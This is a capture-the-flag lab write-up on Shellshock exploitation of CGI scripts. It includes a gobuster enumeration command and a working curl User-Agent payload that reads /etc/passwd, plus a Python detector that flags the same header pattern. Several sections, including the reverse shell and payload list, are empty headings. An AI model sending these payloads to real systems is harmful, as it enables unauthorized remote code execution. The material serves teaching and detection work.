CGI Shellshock Attacks

🎯 Objective: Exploit Shellshock vulnerability in CGI applications via HTTP headers to achieve remote code execution.

Overview

Shellshock (CVE-2014-6271) affects GNU Bash up to version 4.3, allowing command execution through environment variables in CGI applications. The vulnerability lies in Bash's improper handling of function definitions stored in environment variables: Bash parses the definition and also executes any commands that follow it.


HTB Academy Lab Solution

Lab: Shellshock Exploitation

Question: "Enumerate the host, exploit the Shellshock vulnerability, and submit the contents of the flag.txt file located on the server."

Step 1: CGI Script Discovery

# Enumerate CGI scripts
gobuster dir -u http://TARGET/cgi-bin/ -w /usr/share/wordlists/dirb/small.txt -x cgi

# Expected finding: access.cgi
# URL: http://TARGET/cgi-bin/access.cgi

Step 2: Vulnerability Confirmation

# Test Shellshock via User-Agent header
curl -H 'User-Agent: () { :; }; echo ; echo ; /bin/cat /etc/passwd' http://TARGET/cgi-bin/access.cgi

# If vulnerable: /etc/passwd contents returned

Step 3: Command Execution

Step 4: Reverse Shell (Alternative)

Answer: [FLAG_CONTENT] (extract from flag.txt)


Technical Details

Vulnerability Mechanism

CGI Attack Vector

  • Environment variables processed by CGI

  • HTTP headers become environment variables

  • User-Agent, Referer, Cookie headers exploitable

  • Function definition () { :; }; followed by malicious commands
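As an added example (not part of the original lab notes), a small Python detector that applies the header-to-environment mapping described above and flags request headers carrying the Shellshock function-definition pattern; the two sample requests are constructed, and the hostname example.test is a placeholder.

```python
import re
from typing import Dict, List, Tuple

# Bash only triggers on a value that starts with "() {"; the regex is deliberately
# looser (whitespace variants) so that sloppy probes are still flagged.
SHELLSHOCK_RE = re.compile(r"^\s*\(\s*\)\s*\{")


def cgi_env_name(header: str) -> str:
    """CGI (RFC 3875) exports a request header as HTTP_<NAME>: uppercased, '-' -> '_'."""
    return "HTTP_" + header.upper().replace("-", "_")


def parse_request_headers(raw: str) -> Dict[str, str]:
    """Parse the header block of a raw HTTP request into {header-name: value}."""
    headers: Dict[str, str] = {}
    for line in raw.split("\r\n")[1:]:  # skip the request line
        if not line:
            break  # blank line ends the header block
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip()] = value.strip()
    return headers


def find_shellshock(raw: str) -> List[Tuple[str, str]]:
    """Return (CGI env var name, value) pairs whose value is a Bash function definition."""
    hits: List[Tuple[str, str]] = []
    for name, value in parse_request_headers(raw).items():
        if SHELLSHOCK_RE.search(value):
            hits.append((cgi_env_name(name), value))
    return hits


# Constructed sample requests (not captured traffic): one benign, one Shellshock probe.
BENIGN_REQUEST = (
    "GET /cgi-bin/access.cgi HTTP/1.1\r\n"
    "Host: example.test\r\n"
    "User-Agent: Mozilla/5.0 (X11; Linux x86_64)\r\n"
    "\r\n"
)
PROBE_REQUEST = (
    "GET /cgi-bin/access.cgi HTTP/1.1\r\n"
    "Host: example.test\r\n"
    "User-Agent: () { :; }; echo ; echo ; /bin/cat /etc/passwd\r\n"
    "Referer: http://example.test/\r\n"
    "\r\n"
)

if __name__ == "__main__":
    for req in (BENIGN_REQUEST, PROBE_REQUEST):
        print(find_shellshock(req))
```

The same check can be run over an access log that records User-Agent and Referer, since those are the headers a CGI script receives as HTTP_USER_AGENT and HTTP_REFERER.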

Common Payloads


Attack Summary

Prerequisites:

  • CGI application using Bash

  • Vulnerable Bash version (< 4.3 unpatched)

  • HTTP access to CGI scripts

Impact:

  • Remote code execution as web server user

  • File system access for data exfiltration

  • Reverse shell for interactive access

  • Potential privilege escalation vector

💡 Pro Tip: Shellshock is common in legacy systems and IoT devices - always test CGI endpoints with environment variable injection when discovered during enumeration.
